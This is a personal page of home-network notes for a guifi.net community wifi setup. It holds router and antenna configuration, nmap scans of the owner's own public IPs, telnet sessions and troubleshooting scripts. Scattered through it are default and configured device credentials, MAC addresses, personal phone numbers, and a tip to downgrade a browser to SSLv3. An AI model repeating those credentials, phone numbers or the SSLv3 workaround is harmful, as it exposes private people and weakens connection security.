Default user/pwd = 1234/1234 ;

guifi.net configuration (Zyxel)
guifi.net configuration (W7)
servei de Internet - my IPs

Tools : Web Tool Hub, Proxy Server Privacy, Checking Tools

201506 - xarxa detectada :

Proxy: No Proxy Detected City: Barcelona State/Region: Catalonia Country: ES - es flag ISP: Adamo Telecom Iberia S.A. Your IP: 91.126.241.136

NetCraft i nmap :

c:\> nmap 91.126.241.136 Starting Nmap 6.47 ( http://nmap.org ) at 2015-05-18 10:31 Romance Daylight Time Nmap scan report for cli-5b7ef188.bcn.adamo.es (91.126.241.136) Host is up (0.086s latency). Not shown: 990 closed ports PORT STATE SERVICE 21/tcp open ftp 23/tcp open telnet 53/tcp filtered domain 80/tcp open http 81/tcp open hosts2-ns 1723/tcp open pptp 2000/tcp open cisco-sccp 3389/tcp open ms-wbt-server 8080/tcp open http-proxy 8291/tcp open unknown Nmap done: 1 IP address (1 host up) scanned in 22.69 seconds

201507 - 88.0.20.17

c:\> nmap 88.0.20.17 Starting Nmap 6.47 ( http://nmap.org ) at 2015-09-17 10:31 Romance Daylight Time Nmap scan report for 17.Red-88-0-20.dynamicIP.rima-tde.net (88.0.20.17) Host is up (0.041s latency). Not shown: 970 filtered ports, 28 closed ports PORT STATE SERVICE 80/tcp open http 1723/tcp open pptp Nmap done: 1 IP address (1 host up) scanned in 10.97 seconds

20151209 - 2.136.45.31

ISP: Telefonica De Espana Sau Host Name: 31.Red-2-136-45.dynamicIP.rima-tde.net c:\> nmap 2.136.45.31 Starting Nmap 7.00 ( https://nmap.org ) at 2015-12-08 11:40 Romance Standard Time Nmap scan report for 31.Red-2-136-45.dynamicIP.rima-tde.net (2.136.45.31) Host is up (0.015s latency). Not shown: 991 closed ports PORT STATE SERVICE 21/tcp open ftp 22/tcp open ssh 23/tcp open telnet 53/tcp open domain 80/tcp open http 443/tcp open https 1723/tcp open pptp 2000/tcp open cisco-sccp 8291/tcp open unknown Nmap done: 1 IP address (1 host up) scanned in 1.31 seconds

20160107 - 81.32.151.177. Using Tor I get 216.17.99.183, then 158.130.0.242 in 3 minutes.

seguiment myIP (guifi)

WhatIsMyIP diu :

20160127 - 79.146.202.160 20160128 - 2.136.29.12 20160208 - 83.45.118.50 20160215 - 88.0.100.141 20160216 - 2.136.44.79 20160220 - 88.0.20.146 20160225 - 88.0.20.146 20160229 - 88.13.163.125 20160304 - 88.13.163.125 20160307 - 80.35.139.210 {biblio} 20160307 - 2.137.95.105 20160311 - 2.137.95.105 20160311 - 83.39.4.73 20160316 - 83.39.4.73 20160318 - 80.35.139.210 {biblio}, 4,12 Mbps de baixada, 0 de pujada 20160322 - 83.40.227.38 20160518 - 83.36.141.31
SAG @ guifi.net

My Doc : T430\\MisCosas\Guifi.net\ o W500\\miscosas\guifi guifi_a_Torrelles_sag.docx. Guifi_at_Torrelles.doc 2 Albert Homs.

20101108 - compro una NanoStation 5 "loco",NS5 from now on

Antena client wifi 5 GHz nanostation5 loco; 13 dBi, 150 mW, 5 GHz, 802.11 a, 54 Mbps, 10 Km range. TX Power: max. 24dBm, +/-2dB ; RX Sensitivity: min. -94dBm +/-2dB
WimaCom 65 € amb IVA ; Cilctel 68 € - [2x PLC = 80 €] ; Setup Informatica 78 € ;

Default IP = 192.168.1.20 ;
usr/pwd = ubnt (root/guifi after OneTouch cfg, file "unsolclick.cfg"; also nano5's IP is 192.168.1.1 after this moment, so you'd better change router IP to 192.168.1.2);
OpSys = AiROS v 3.5 ; MAC = (1012L) 00:15:6D:18:C8:95 ;

El fitxer de configuracio de la NS5 s'agafa d'aqui : anar al node, escollir solapa "Trastos", escollir "unsolclic" i obrir enllaç.

Tot el que es pot fer amb una NanoStation loco ("2" o "5") ... Acacha [*****] - all menus, IP (192.168.1.20), etc etc

NS@guifi ; Forums (cat). Proxy's. Users.

El meu node és el 33491 i soc el usuari 14116.
La meva IP interna : 10.139.130.69/27 al AP1 del Campanar. (GateWay 10.139.130.65, DNS 10.139.130.34).
{20160307} IP 10.139.130.117/27 al AP3 del Campanar {gw 10.139.130.97}

Detalls TCP/IP de casa
nano-5 ZyXel TPsag TPio TPnav TPaav TPiav mac 00:15:6D:19:C8:95 40:4A:03:B1:DB:98 (lan)00:22:68:1F:D0:E4 (lan) (lan)aa:bb:cc:dd:ee:ff (lan)00:16:36:A7:9E:B2 (lan)00:23:8B:12:3E:30 ip 192.168.1.1 192.168.1.2 192.168.1.99 192.168.1.xx 192.168.1.xx 192.168.1.xx 192.168.1.xx u/p root/guifi admin/admin (wifi)00:21:6A:B6:CD:56 (wifi) (wifi)00:10:A7:2C:42:1A (wifi)00:1A:73:03:18:45 (wifi)00:21:5D:4C:3E:D0
my MACs
00:22:68:1F:D0:E4 - W500 lan 00:21:6A:B6:CD:56 - W500 wifi 40:4A:03:AF:5B:FB - old Zyxel 40:4A:03:B1:DB:98 - new Zyxel 44:74:6C:D1:9A:08 - sony Xperia sag 44:A7:CF:37:F3:F7 - LG-P500 sag 54:EE:56:C0:00:01 - T550 lan 60:57:18:6B:44:7D - T550 wifi 6C:88:14:0E:D5:E0 - T430 Sebas C0:56:27:03:29:18 - Belkin lan/wlan C0:56:27:03:29:19 - Belkin wan F0:7B:CB:11:F2:5C - Arcadi Acer
Esquema de la meva ferralla actual
<<< 10.139.130.69 (AP1) {gw 10.130.130.65} <<< 10.139.130.117 (AP3) {gw 10.130.130.97} .-----------​​--​​-​​​-​​--. .---------------. | ​​ ​​ ​​​ ​​​| | | <<< 192.168.1.219 | Antena ​​ ​​ ​ ​ ​​​ ​| ​ .-----. ​ ​LAN​ | Router | LAN​ WAN .---------------. LAN .--------. | NanoStati​​on​​ ​5​ ​​| === | PoE | ==== | ZyXel | =======.======= | Belkin | ======= | w7 | | ​​ ​​ ​​ | .-----. | | ! .---------------. .--------. | ​​ ​​ ​​ | | | ! IP = 192.168.2.1 >>> IP = 192.168.2.2 .-------------​​-​​-​​-​​-. .---------------. ! GW = 192.168.2.1 ! DNS = 192.168.2.1 Default values Default values ! .---------------. IP = 192.168.1.20 ; IP = 192.168.1.1 ; .======= | W7 | u/p = ubnt/ubnt ; u/p = ​1234/​1234 ; .---------------. Configured values Configured values Configured values IP = 192.168.1.1 >>> IP = 192.168.1.2 ; IP = 192.168.1.99 ; u/p = root/guifi ; u/p = ​1234/mypwd [] Network Mask = 255.255.255.0 ; {use IE v6 or wget} Default Gateway = 192.168.1.1 ; DNS = 192.168.1.1 / 8.8.8.8 ;
NanoStation 5

És bàsic que l'antena tingui senyal del Campanar i es pugui veure des un browser:

nano5
Firmware

Firmware version : XS5.ar2313.v3.5.4494.091109.1459 {SAG}, XS5.ar2313.v4.0.4974.110823.1731 {LL.M.}

Si en accedir a la NS5 el Chrome "47.0.2526.73 m" ens diu

A secure connection cannot be established because this site uses an unsupported protocol. ERR_SSL_VERSION_OR_CIPHER_MISMATCH

Change Chrome advanced flags to support SSL v3.0 :

  1. in the Chrome address bar type: chrome://flags
  2. scroll down to Minimum SSL/TLS version supported and change it to SSLv3
  3. restart chrome

En la mateixa IP (NS5, 192.168.1.1), Firefox "Nightly 45.0a1" diu

Firefox cannot guarantee the safety of your data on 192.168.1.1 because it uses SSLv3, a broken security protocol. Advanced info: ssl_error_unsupported_version

Tambe Firefox 41.0 at Ubuntu 14

IE 11.0.9600.18097 : Turn on TLS 1.0, TLS 1.1, and TLS 1.2 in Advanced settings and try connecting to https://192.168.1.1 again. If this error persists, contact your site administrator.

VM(xp_min) : IE 6.0.2900.5512 : All OK

Altres error usuals

ERR_SSL_PROTOCOL_ERROR

Un altre :

SSL server probably obsolete. ERR_SSL_FALLBACK_BEYOND_MINIMUM_VERSION
Telnet

Podem fer telnet a la nano:

c:\> telnet 10.139.130.nn NodeSebastiaNetRd1 login: root Password: BusyBox v1.01 (2009.11.09-13:03+0000) Built-in shell (ash) Enter 'help' for a list of built-in commands. XS5.ar2313.v3.5.4494.091109.1459# ls -al drwxr-xr-x 1 root admin 1230 Nov 9 13:05 bin drwxrwxrwt 3 root admin 900 Jan 1 2000 dev lrwxrwxrwx 1 root admin 7 Nov 9 13:05 etc -> var/etc drwxr-xr-x 1 root admin 453 Nov 9 13:05 lib -rwxr-xr-x 1 root admin 3502 Nov 9 13:05 linuxrc dr-xr-xr-x 25 root admin 0 Jan 1 2000 proc lrwxrwxrwx 1 root admin 3 Nov 9 13:05 sbin -> bin lrwxrwxrwx 1 root admin 7 Nov 9 13:05 tmp -> var/tmp drwxr-xr-x 1 root admin 26 Nov 9 13:05 usr drwxrwxrwt 6 root admin 120 Jan 1 2000 var XS5.ar2313.v3.5.4494.091109.1459#

O no ?

c:\> telnet 10.139.238.nnn Connecting To 10.139.238.nnn...Could not open connection to the host, on port 23: Connect failed
Problemes DNS

{Israel Antunez} Li recomanem que, si te configurat aquest proxy, el canvii pel del punt omnia ip: 10.139.238.194, port: 3128

{Carlos Vargas} Mentre dura aquest incident, us aconsellem que utilitzeu el proxy del Punt Omnia, 10.139.238.194

Ferralla d'en Lluis, en Balta i en Andreu
<<< 10.139.130.100 .-----------​​--​​-​​​-​​--. .---------------. | ​​ ​​ ​​​ ​​​| | | WAN .-------------. Default : 192.168.1.1 (admin/admin) | Antena ​​ ​​ ​ ​ ​​​ ​| ​ .-----. ​ ​ ​ | | ============================== | Ovis Lluis | | NanoStati​​on​​ ​5​ ​​| ======= | PoE | ======= | TP Link | 192.168.1.162 .-------------. Configured : 192.168.2.1 | ​​ ​​ ​​ | .-----. | | | ​​ ​​ ​​ | | | .-------------​​-​​-​​-​​-. | | | | Default values | | IP = 192.168.1.20 ; | | WAN .-------------. Default : 192.168.1.1 (admin/admin) u/p = ubnt/ubnt ; | | ============================= | Ovis Balta | | | 192.168.1.174 .-------------. Configured : 192.168.3.1 Configured values .---------------. IP = 192.168.1.254 >>> u/p = root/guifi ; Default values {use IE} IP = 192.168.0.1 ;

El router/AP és un Evo-W54ARv2. Hem escrit un document de com es configura : W500\\guifi\lluis\Configuracio_del_router_OvisLink_per_guifi.docx.

Per fer-li un "reset", cal :

  1. turn on the AP power
  2. press and hold the "Reset" button for 10 seconds
  3. release the "Reset" button and wait the router to reboot

Llavors agafa la IP 192.168.1.1 i usr/pwd "admin/admin"

Els seus llums frontals son:

Ferralla d'en Carlos, TDLMontserratroig22a
<<< 10.139.238.141 .-----------​​--​​-​​​-​​--. .---------------. | ​​ ​​ ​​​ ​​​| | | | Antena ​​ ​​ ​ ​ ​​​ ​| ​ .-----. ​ ​LAN​ | ​​Router | LAN​ .--------. | NanoStati​​on​​ ​5​ ​​| === | PoE | ==== | Fabricant​ | ======== | ​XP ​| | ​​ ​​ ​​ | .-----. | | .--------. | ​​ ​​ ​​ | | | ​ ​ IP = 192.168.​8.20 .-------------​​-​​-​​-​​-. .---------------. GW = 192.168.​8.111​ DNS = ​8.8.8.8​ Default values Default values 10.139.130.34 IP = 192.168.1.20 ; IP = 192.​​168.​​0​.1 ; u/p = ubnt/ubnt ; u/p = ​​?​/​​​?​ ; ​​ Configured values Configured values IP = 192.168.8.111 ​ ​ IP = ​? ; u/p = root/guifi ; u/p = ​?/? ;
Serveis
FTP

OK Filezilla client 3.3.5.1
s'ha de configurar el Proxy amb Squid.

Filezilla 3.2.7.1 : Edita, Paràmetres, Connexió, Servidor Intermediari Genéric, marcar tipus HTTP 1.1, IP+port+usr+pwd.
Te bajas el ultimo Filezilla Client (3.3.5.1) de aki : url
Lo arrancas y vas a : edit, settings, connection, "generic proxy", escoges HTTP/1.1 using CONNECT, pones nuestro proxy:puerto y luego user:pwd.
Total Commander 7.55a, File Manager amb FTP integrat, con el modo FTP on HTTP.

wget

WGET : fer un CMD que contingui

echo "WGET per Guifi.net de la url (" %1 ")." set http_proxy=http://proxy.torrelles.guifi.net:3128 c:\eines\WGET.EXE --proxy-user=usuari.guifi --proxy-passwd=clau.guifi %1
VPN

VPN ?

http://80.32.135.160/ - no hi arriba (VPN bisc tfca). OK == Connection refused.
http://213.229.144.190/ - no hi arriba (VPN bisc colt). OK == Connection refused.

IM = Instant Messanging

Messenger - si "v 2009"
Ir a IE : cfg proxy:port Ir a Messenger : Herramientas, Opciones, Conexion, Configuraciones Avanzadas. Ver proxy y puerto de IE + poner usr+pwd

Alternatives : pidgin - universal chat client : homepage; AMSN ; Browser based : eBuddy.

Skype

SkyPe - si "v 5.0.0.152"

Remote Desktop

Remote Desktop o escriptori remot per proxy : TeamViewer.

With TeamViewer you can remotely control any computer as if you were sitting right in front of it - even through firewalls. All your partner has to do is start a small application, which does not even require installation or administrative rights. No installation is required, just run the application on both sides and connect - even through tight firewalls.

Spotify

Spotify ?
Abrimos Spotify y nos vamos a Edit > Preferences. En la parte de Proxy seleccionamos HTTP, e ingresamos la direccion y el puerto. No olvidar presionar Apply para guardar los cambios. Reiniciamos el programa.
Confirmacio : url
Alternativa : http://listen.grooveshark.com/, as "Jamendo/Magnatune" at Ubuntu ... {Francisco says}

WinAmp

WinAmp - si "v 5.56" : General Preferences + usr:pwd@10.139.130.34:3128
Radio Paradise

Troubleshooting
  1. ping 192.168.1.2 (router)
  2. ping 192.168.1.1 (nanostation)
  3. ping 10.139.130.69 (own)
  4. ping 10.139.130.65 (GateWay) []
  5. ping 10.139.130.34 (DNS)
  6. ping 10.139.130.34 (proxy.torrelles.guifi.net) + telnet port 3128
  7. ping 10.139.238.194 (punt Omnia)
  8. ping 88.17.203.10 (own, external IP)

He muntat un Smokeping, sistema que momitoritza la qualitat del enlaç. Tambe tinc un MRTG recollint dades.

Troubleshooting guifi, PI.CMD
@echo off set NUM=10 if .%1. == .+. goto bucdns if .%1. == .-. goto bucncsi if .%1. == .t. goto buctracert if .%1. == .0. goto bucping if .%1. == .?. goto ajuda :========================================================== :bucle time /t ping www.google.com -n %NUM% goto bucle :========================================================== :bucdns netsh int ipv4 show interfaces :bucdns2 nslookup www.google.es goto bucdns2 :========================================================== :bucncsi nslookup dns.msftncsi.com goto bucncsi :========================================================== :buctracert echo #### #### #### #### #### #### #### #### ruta des casa meva fins la xarxa time /t tracert -d 1.2.3.4 ping -n 1 -w 900 1.2.3.4 cls goto buctracert :========================================================== :bucping ping www.google.com -t goto bucping :========================================================== :ajuda netsh int ipv4 show interfaces echo nothing = PING GOOGLE -N 10 echo + = hw i NSLOOKUP Google echo - = NSLOOKUP MS-FT-NCSI echo t = TRACERT 1.2.3.4 echo 0 = PING GOOGLE -T echo ? = netsh int ipv4 show interfaces :fin
Zyxel MAC filter & signal strength

Nice page: comandos router Zyxel

c:\> telnet 192.168.1.2 Copyright (c) 1994 - 2006 ZyXEL Communications Corp. P-660HW-D1 Main Menu Getting Started Advanced Management 1. General Setup 21. Filter Set Configuration 2. WAN Backup Setup 22. SNMP Configuration 3. LAN Setup 23. System Security (change pwd here) 4. Internet Access Setup 24. System Maintenance (change signal strenght here) 25. IP Routing Policy Setup Advanced Applications 26. Schedule Setup 11. Remote Node Setup 12. Static Routing Setup 14. Dial-in User Setup 99. Exit 15. NAT Setup Menu 1 - General Setup System Name= ? Location= Contact Person's Name= Domain Name= Edit Dynamic DNS= No Route IP= Yes Bridge= No Menu 3 - LAN Setup 1. LAN Port Filter Setup 2. TCP/IP and DHCP Setup 5. Wireless LAN Setup Menu 3.2 - TCP/IP and DHCP Setup DHCP Setup DHCP= None Client IP Pool Starting Address= N/A Size of Client IP Pool= N/A Primary DNS Server= 80.58.61.250 Secondary DNS Server= 80.58.61.254 Remote DHCP Server= N/A TCP/IP Setup: IP Address= 192.168.1.2 IP Subnet Mask= 255.255.255.0 RIP Direction= Both Version= RIP-2B Multicast= IGMP-v2 IP Policies= Edit IP Alias= No Menu 3.5- Wireless LAN Setup Key Auto-generation= N/A ESSID= WLAN_GAS Hide ESSID= No Channel ID= CH09 2452MHz RTS Threshold= 2432 Frag. Threshold= 2432 WEP= N/A Default Key= N/A Key1= N/A Key2= N/A Key3= N/A Key4= N/A Edit MAC Address Filter= No Menu 3.5.1 - WLAN MAC Address Filter Active= No Filter Action= Allowed Association ------------------------------------------------------------------------------ 1= 00:10:a7:2c:42:1a 13= 00:00:00:00:00:00 25= 00:00:00:00:00:00 2= 00:00:00:00:00:00 14= 00:00:00:00:00:00 26= 00:00:00:00:00:00 3= 00:00:00:00:00:00 15= 00:00:00:00:00:00 27= 00:00:00:00:00:00 4= 00:00:00:00:00:00 16= 00:00:00:00:00:00 28= 00:00:00:00:00:00 5= 00:00:00:00:00:00 17= 00:00:00:00:00:00 29= 00:00:00:00:00:00 6= 00:00:00:00:00:00 18= 00:00:00:00:00:00 30= 00:00:00:00:00:00 7= 00:00:00:00:00:00 19= 00:00:00:00:00:00 31= 00:00:00:00:00:00 8= 00:00:00:00:00:00 20= 00:00:00:00:00:00 32= 00:00:00:00:00:00 9= 00:00:00:00:00:00 21= 00:00:00:00:00:00 10= 00:00:00:00:00:00 22= 00:00:00:00:00:00 11= 00:00:00:00:00:00 23= 00:00:00:00:00:00 12= 00:00:00:00:00:00 24= 00:00:00:00:00:00 ------------------------------------------------------------------------------ Enter here to CONFIRM or ESC to CANCEL: Press Space Bar to Toggle. Menu 4 - Internet Access Setup ISP's Name= MyISP Encapsulation= PPPoE Multiplexing= LLC-based VPI #= 8 VCI #= 32 ATM QoS Type= UBR Peak Cell Rate (PCR)= 0 Sustain Cell Rate (SCR)= 0 Maximum Burst Size (MBS)= 0 My Login= adslppp@telefonicanetpa My Password= ******** Idle Timeout (sec)= 0 IP Address Assignment= Dynamic IP Address= N/A Network Address Translation= SUA Only Address Mapping Set= N/A Menu 23.4 - System Security - IEEE802.1x Wireless Port Control= Authentication Required ReAuthentication Timer (in second)= 1800 Idle Timeout (in second)= 3600 Key Management Protocol= WPA-PSK Dynamic WEP Key Exchange= N/A PSK= ******** WPA Mixed Mode= N/A WPA Broadcast/Multicast Key Update Timer= 1800 Authentication Databases= N/A Enter Menu Selection Number: 8 (after "24") Copyright (c) 1994 - 2006 ZyXEL Communications Corp. ras> dir Valid commands are: sys exit ether wan wlan ip ppp bridge bm lan radius 8021x ras> ras> wlan load ; cargar la configuración inalámbrica en el buffer para modificar ras> wlan power 1 ; [1:19dbm=79mW / 2:18dbm=63mW / 3:16dbm=39mW / 4:15dbm=31mW / 5:14dbm=25mW] ras> wlan save ; guarda los cambios realizados wlan: save ok ras> ras> wlan clear ; borra la configuración inalámbrica ras> wlan reset ; reinicia la WLAN ras> wlan active 1 ; enciende la red WIFI ras> wlan active 0 ; apaga la red WIFI ras> wlan load {20151231} ras> wlan display essid = WLAN_GAS2 chid = 9 hide essid = No RTS threshold = 2432 Frag threshold = 2432 WEP key type = none WEP default key = 1 MAC filter active = 0 MAC filter action = Allow index MAC address index MAC address -------------------------------------------------- 1 00:00:00:00:00:00 17 00:00:00:00:00:00 2 00:00:00:00:00:00 18 00:00:00:00:00:00 3 00:00:00:00:00:00 19 00:00:00:00:00:00 4 00:00:00:00:00:00 20 00:00:00:00:00:00 5 00:00:00:00:00:00 21 00:00:00:00:00:00 6 00:00:00:00:00:00 22 00:00:00:00:00:00 7 00:00:00:00:00:00 23 00:00:00:00:00:00 8 00:00:00:00:00:00 24 00:00:00:00:00:00 9 00:00:00:00:00:00 25 00:00:00:00:00:00 10 00:00:00:00:00:00 26 00:00:00:00:00:00 11 00:00:00:00:00:00 27 00:00:00:00:00:00 12 00:00:00:00:00:00 28 00:00:00:00:00:00 13 00:00:00:00:00:00 29 00:00:00:00:00:00 14 00:00:00:00:00:00 30 00:00:00:00:00:00 15 00:00:00:00:00:00 31 00:00:00:00:00:00 16 00:00:00:00:00:00 32 00:00:00:00:00:00 ras> wlan power outputpower <1-5: TX Power Level> ras>
OpSys 4 NS5

Openwrt 10.03 Backfire - lliure i altament personalitzable. Es fa servir per xarxa mesh (bàsicament una xarxa que funciona en mode ad-hoc i un protocol d'enrutament específic)

DD-WRT.

Squid proxy

Wiki.

c:\> telnet proxy.torrelles.guifi.net 3128 HTTP/1.0 400 Bad Request Server: squid/2.7.STABLE6 Date: Tue, 23 Aug 2011 20:31:06 GMT Content-Type: text/html Content-Length: 1316 X-Squid-Error: ERR_INVALID_REQ 0 X-Cache: MISS from torrelles.guifi.net X-Cache-Lookup: NONE from torrelles.guifi.net:3128 Via: 1.0 torrelles.guifi.net:3128 (squid/2.7.STABLE6) Connection: close <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <html><head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8"> <title>ERROR: The requested URL could not be retrieved</title> <style type="text/css"> <!-- %l body :lang(fa) { direction: rtl; font-size: 100%; font-family: Tahoma, Roya, sans-serif; float: right; } :lang(he) { direction: rtl; float: right; } --> </style> </head> <body> <div id="titles"> <h1>ERROR</h1> <h2>The requested URL could not be retrieved</h2> </div> <hr> <div id="content"> <p><b>Invalid Request</b> error was encountered while trying to process the request:</p> <blockquote id="data"> <pre>jaja </pre> </blockquote> <p>Some possible problems are:</p> <ul> <li><p>Missing orunknown request method.</p></li> <li><p>Missing URL.</p></li> <li><p>Missing HTTP Identifier (HTTP/1.0).</p></li> <li><p>Request is too large.</p></li> <li><p>Content-Length missing for POST or PUT requests.</p></li> <li><p>Illegal character in hostname; underscores are not allowed.</p></li> </ul> <p>Your cache administrator is <a href="mailto:webmaster%W">webmaster</a>.</p> <br> </div> <hr> <div id="footer"> <p>Generated Tue, 23 Aug 2011 20:31:06 GMT by torrelles.guifi.net (squid/2.7.STABLE6)</p> <!-- ERR_INVALID_REQ --> </div> </body> </html> Se ha perdido la conexión con el host.
Firewall

MikroTik RouterOS v 2.5, Jul 2002

Usr admin, pwd <empty>.

kntrl
Super node


Amunt! Top Amunt!
Movistar

Su Movistar Internet incluye:

Las llamadas incluidas son de ámbito nacional.

Preu : 33,8843 €/mes - 11,6500 € (promoción Movistar Internet, durante 12 meses)

Router "equipo acceso fibra óptica GPT-2541 GNAC". És un "Mitra". Cifrado : WPA2-PSK. Encriptación : AES.

W500 can connect to MOVISTAR_PLUS_BCD1 at 5 GHz.

seguiment myIP (movistar)

WhatIsMyIP o IPinfo diu :

20160318 - 88.1.200.218 20160319 - 83.50.48.155 20160402 - 88.7.220.132 20160410 - 88.7.220.132 20160425 - 88.7.220.132 20160516 - 88.16.67.1 {returning to enxaneta from wlangas2} 20160529 - 88.16.67.1 20160606 - 88.17.57.125 20160608 - 88.7.181.116 20160705 - 88.7.181.116 20160711 - 88.17.57.34 20160719 - 88.18.117.86
Velocitats

Velocidad bajada = 25,5 Mbps, subida = 30 Mbps {PLUS_BCD1}
Velocidad bajada = 66, subida = 32 {BCD1}

Trassa
c:\> tracert -d 1.2.3.4 {PLUS_BCD1} Tracing route to 1.2.3.4 over a maximum of 30 hops 1 183 ms 1 ms 2 ms 192.168.1.1 2 206 ms 2 ms 2 ms 10.139.130.97 3 216 ms * 8 ms 172.25.66.1 4 234 ms 5 ms 4 ms 172.25.51.178 5 25 ms 12 ms 13 ms 192.168.4.1 6 * * * Request timed out. 7 32 ms 9 ms 7 ms 80.58.67.116 8 216 ms 9 ms 10 ms 80.58.118.249 9 * * * Request timed out. C:\> tracert -d 1.2.3.4 {BCD1} Tracing route to 1.2.3.4 over a maximum of 30 hops 1 2 ms 2 ms 3 ms 192.168.1.1 2 42 ms 5 ms 4 ms 192.168.144.1 3 7 ms 7 ms 6 ms 80.58.121.233 81.46.131.33 {20160402} 4 * * * Request timed out.
Administració router
Restaurar a valores de fábrica

Con el router encendido, presionar el botón Reset (último a la derecha por detrás) durante al menos 10 segundos. Transcurridos 90 segundos, el router tendrá los valores de fábrica de nuevo.


Appendix: 802.11b demystified

BSS = Basic Service Set
A cell of stations which may or may not have an access point. A "coordination function" acts as collision detection.

IBSS = Independent Basic Service Set
A self-contained BSS with no access point, one of the members can assume the "coordination function". This is the 802.11 peer-to-peer mode of operation also known as Ad-Hoc mode. Only one wireless "cell" is supported for each different SSID. All communication is done from Client to Client without the use of an Access Point. Clients use the same SSID for establishing the wireless connection.

SSID = Service Set Identifier
A 32 octet-long network name; exactly one per ESS or IBSS.

Infrastructure mode = Managed mode
This mode of operation requires the presence of an 802.11 Access Point. All communication is done via the Access Point which relays packets to other wireless Clients in the BSS as well as to nodes on a wired network such as Ethernet.

ESS = Extended Service Set
A set of one or more interconnected BSSes. All traffic flows through an access point.

BSSID
6 octet cell identifier for a BSS. Value is the same as access point MAC address. Used in iwconfig for the cell value.

Origin URL  



WiFi vs BlueTooth

Amunt! Top Amunt!

wifi specs

2.462.000 KHz = 2.462 MHz = 2,462 GHz

url

bluetooth specs

A Bluetooth device playing the role of the "master" can communicate with up to 7 devices playing the role of the "slave". This network of "group of up to 8 devices" (1 master + 7 slaves) is called a piconet.
Every device has a unique 48-bit address. Every device also has a 24-bit class identifier.

Air interface

The protocol operates in the license-free ISM band at 2.45 GHz. In order to avoid interfering with other protocols which use the 2.45 GHz band, the Bluetooth protocol divides the band into 79 channels (each 1 MHz wide) and changes channels up to 1600 times per second. Implementations with versions 1.1 and 1.2 reach speeds of 723.1 kbit/s. Version 2.0 implementations feature Bluetooth Enhanced Data Rate (EDR) , and thus reach 2.1 Mbit/s.
Technically version 2.0 devices have a higher power consumption, but the three times faster rate reduces the transmission times, effectively reducing consumption to half that of 1.x devices (assuming equal traffic load).

url

Bluetooth differs from Wi-Fi

The latter provides higher throughput and covers greater distances but requires more expensive hardware and higher power consumption. They use the same frequency range, but employ different multiplexing schemes. While Bluetooth is a cable replacement for a variety of applications, Wi-Fi is a cable replacement only for local area network access.

A glib summary is that Bluetooth is wireless USB, whereas Wi-Fi is wireless Ethernet, both operating at much lower bandwidth than the cable systems they are trying to replace.


How stuff works :
One of the ways Bluetooth devices avoid interfering with other systems is by sending out very weak signals of about 1 milliwatt ...
Bluetooth can connect up to eight devices simultaneously ...
Bluetooth uses a technique called spread-spectrum frequency hopping that makes it rare for more than one device to be transmitting on the same frequency at the same time. In this technique, a device will use 79 individual, randomly chosen frequencies within a designated range, changing from one to another on a regular basis. In the case of Bluetooth, the transmitters change frequencies 1,600 times every second, meaning that more devices can make full use of a limited slice of the radio spectrum. Since every Bluetooth transmitter uses spread-spectrum transmitting automatically, it's unlikely that two transmitters will be on the same frequency at the same time. This same technique minimizes the risk that portable phones or baby monitors will disrupt Bluetooth devices, since any interference on a particular frequency will last only a tiny fraction of a second.
When Bluetooth-capable devices come within range of one another, an electronic conversation takes place to determine whether they have data to share or whether one needs to control the other. The user doesn't have to press a button or give a command -- the electronic conversation happens automatically. Once the conversation has occurred, the devices -- whether they're part of a computer system or a stereo -- form a network. Bluetooth systems create a personal-area network (PAN), or piconet, that may fill a room or may encompass no more distance than that between the cell phone on a belt-clip and the headset on your head. Once a piconet is established, the members randomly hop frequencies in unison so they stay in touch with one another and avoid other piconets that may be operating in the same room.


Links

Mòbils

Amunt! Top Amunt!
  • Estandards
    • GSM
      Com va ? El canvi de frequencies en canviar de cel.lula ? El Roaming ?
      Teleco info, good intro.
      Com es fa una recàrrega ?
      • as CORTIX : arriba un missatge !
      • as usual : buy a card and enter the (large) code. Is anything sent before "saldo" is updated ?

      Com puc consultar el meu saldo per Internet ?

    • GPRS [General Packet Radio Service]

    • UMTS [Universal Mobile Telecommunications System]  
      Telefonia móvil de tercera generación.
      • España
        • Telefónica
        • Vodafone
        • Amena Auna - Oct 2004
        • Xfera
      • Francia
        • Orange (France Telecom)
        • SFR (Vivendi)
      • Alemania
        • T-Mobile (Deutsche Telekom)
        • Vodafone
        • Mobil COm (France Telecom)
        • 3G (Telefonica/Sonera)
        • E-Plus (KPN)
      • Italia
        • Telecom Italia Mobile
        • Omnitel (Vodafone)
        • Wind (France Telecom)
        • Telefonica PSE
        • Andala
      • Reino Unido
        • Vodafone [CDM ???]
        • TIW
        • Orange
        • British Telecom
        • Onezone
    • HDSPA (Feb 2006)

  • USA (millones de clientes)
    • Verizon Wireless : 36
    • Cingular : 23,4 [GSM] (1) unides el 18/Feb/2004
    • AT&T wireless : 21,9 [GSM] (1)
    • Sprint : 15,5
    • Nextel : 12,3
    • T-mobile : 12,1

  • Operadors mundials [9/3/2004]
    1. China Mobile
    2. Vodaphone
    3. China Unicom
    4. TEM + BSLA : 62,5 millons
    5. T-Mobile
    6. Orange
    7. NTT DoComo
    8. Cingular + AT&T Wireless

  • alliberació

  • IMEI : Enter *#06# on your phone's key pad and the 15 digit number will be displayed on the screen.

  • Com es fa : vaig al CORTIX, em cobren uns diners, envien un SMS dient que tinc mes saldo. El saldo es a la tarjeta o a la central ?

  • Com es passa l'agenda del mobil al PC i al inrevés ?
    CF62 - easy : use Siemens Data Suite [18,7 MB]
    Cable :
    • conexion to COM port : DCA-500
    • conexion to USB port : DCA-510

    f:\miscosas\CF62 !

 


  • Ionna : 666.36.38.42 - Siemens C45.

  • Nico : 670.85.84.98 - Siemens C45.

    2-on : 66666.38.59 - Siemens SL-55

  • Arcadi : 66.10.66.400 - Nokia 5140

  • CF62 - Siemens : 667.33.88.59

  • V3 - Motorola : 677.65.86.99

http://www.my-siemens.com

http://www.vidisa.es


Configuring an Access Point as a wireless repeater

Read Link Sys


Dubtes

Differences :

See BT4 and wiki.

Seguretat & WiFi & jerga
Wireless security type : Use 802.1x EAP Cisco (LEAP) + data encryption = TKIP.

802.1x, EAP.



Amunt! Top Amunt!
Tools
Phone
Scan range for alive IPs
c:\> FOR /L %i IN (1,1,255) DO @echo 192.168.1.%i & @ping -n 2 192.168.1.%i -w 900 | find "Reply"

Wifi 802.11x speeds

IEEE Standard / Speed

802.11a


Amunt! Top Amunt!
Wifi links

Ep ! Site under construction. Escriu-me !
Updated 20160719 (a)  
Uf !